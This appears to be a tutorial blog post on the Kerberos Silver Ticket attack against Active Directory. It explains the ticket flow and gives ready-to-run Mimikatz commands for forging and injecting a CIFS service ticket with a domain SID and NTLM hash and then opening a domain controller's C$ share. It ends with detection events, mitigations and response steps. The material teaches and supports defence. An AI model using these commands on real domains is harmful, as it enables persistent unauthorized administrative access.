Kerberos attacks 3-Silver Ticket

4 minute read

Goal

Forge service ticket

Silver Ticket

  • Technique to maintain persistence in an already compromised domain
  • A Silver Ticket is a forged Kerberos Ticket Granting Service (TGS) ticket
  • A silver ticket attack involves compromising credentials and abusing the design of the Kerberos protocol.
  • A silver ticket only allows an attacker for forge ticket-granting service (TGS) tickets for specific services.
  • TGS tickets are encrypted with the password hash for the service – therefore, if an adversary steals the hash for a service account they can mint TGS tickets for that service.
  • A attacker can create a Silver Ticket by cracking a computer account password and using that to create a fake authentication ticket. Kerberos allows services to log in without double-checking that their token is actually valid, which attackers have exploited to create Silver Tickets.

Kerberos Authentication Flow

  • 1-Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC as an authenticator in the authentication ticket (TGT) request
  • 2-KDC checks user information and creates TGT
  • 3-The TGT is encrypted, delivered to the user. Only the KRBTGT in the domain can open and read TGT data.
  • 4-The User presents the TGT to the DC when requesting a TGS ticket ,The DC opens the TGT & validates PAC checksum –> If the DC can open the ticket & the checksum check out, TGT = valid. The data in the TGT is effectively copied to create the TGS ticket.
  • 5-The TGS is encrypted using the target service accounts’ NTLM password hash and sent to the user
  • 6.The user connects to the server hosting the service & presents the TGS,The service opens the TGS ticket using its NTLM password hash.

Silver Ticket Attacks Work

Silver Ticket Attacks are post-exploitation attacks. That means that a threat actor must already have compromised a target system in the environment before they can generate a Kerberos Silver Ticket.

  • 1-gather information about the domain, such as the domain name and domain security identifier (SID)
  • 2-Obtain the DNS name under which the service principal name (SPN) for the targeted
  • 3-Use Mimikatz to obtain the local NTLM password (or password hash) for the Kerberos service running on the compromised system
  • 4-Use Mimikatz to forge a Kerberos TGS

Argument

kerberos::golden     ##Name of the module (there is no Silver module) 
/User:Administrator  ##Username for which the TGT is generated 
/domain :karim.net   ## Domain Name 
/sid:S-1-5-21-750046758-1551849808-2392872301 ## SID of the domain 
/target : win10.karim.net ## Target machine
/service: cifs  The SPN name of service for which TGS is to be created 
/rc4:6f5b5acaf7433b3282ac22e21e62ff22  ## NTLM  hash of the service account.
/id:500 /groups:512    ## Optional User RID (default 500) and Group (default 513 512 520 518 519) 
/ptt    ##Injects the ticket in current PowerShell process, no  to save the ticket on disk 
/startoffset:0  (Optional)the start offset when the ticket is available (default 0)
/endin:600 ##Optional ticket lifetime (default is 10 years) . The default AD setting is 10 hours = 600 minutes
/renewmax:10080 ##Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800 
                

group identifier

512 ##Domain Admins
513 ##Domain Users
518 ##Schema Admins
519 ##Enterprise Admins
520 ##Group Policy Creator Owners

Getting a user’s SID

whoami /user

Getting-gz

Create the silver ticket

kerberos::golden /user:Administrator /domain:karim.net /rc4:de26cce0356891a4a020e7c4957afc72 /target:domainAD.karim.com /sid:S-1-5-21-750046758-1551849808-2392872301 /service:CIFS /id:500 /ptt

Getting-gz

List current tickets

klist

Getting-gz

save ticket in file

kerberos::golden /user:Administrator /domain:karim.net /rc4:de26cce0356891a4a020e7c4957afc72 /target:domainAD.karim.com /sid:S-1-5-21-750046758-1551849808-2392872301 /service:CIFS /id:500 

Getting-gz

Inject in memory using mimikatz

kerberos::ptt  ticket.kirbi

Getting-gz

Access domain controller

dir \\domainAD.karim.net\c$

Getting-gz

Detect

  • The normal process of obtaining a TGS ticket involves asking a domain controller to generate one.
  • After the client proves their identity, the domain controller with reply with a TGS encrypted with the service account password.
  • detecting silver tickets is only possible on the endpoint and involves examining TGS tickets for subtle signs of manipulation, such as: usernames that don’t exist, modified group memberships (added or removed)
  • The Account Domain field is blank when it should be DOMAIN
  • The Account Domain field is DOMAIN FQDN when it should be DOMAIN.
  • Events:
    • 4624 Account Logon
    • 4634 Account Logoff
    • 4672 Admin Logon

Mitigate

several mitigations exist that can make it harder for an adversary to compromise service account password hashes.

  • Protect assets (especially the domain controller)
  • Same mitigations as for kerberoastig apply
  • Reduce administrative access to member workstations and servers to the least required.
  • Remove end-user administrative privileges on member workstations.
  • Adopt strong password hygiene practices for service accounts.
  • Do not allow users to possess administrative privileges across security boundaries.

Respond

If a silver ticket is detected, several response actions can be taken:

  • Activate the incident response process and alert the incident response team.
  • Reset the password of the compromised service account.

I finished part 3 in Kerberos attacks today waite me in the next part.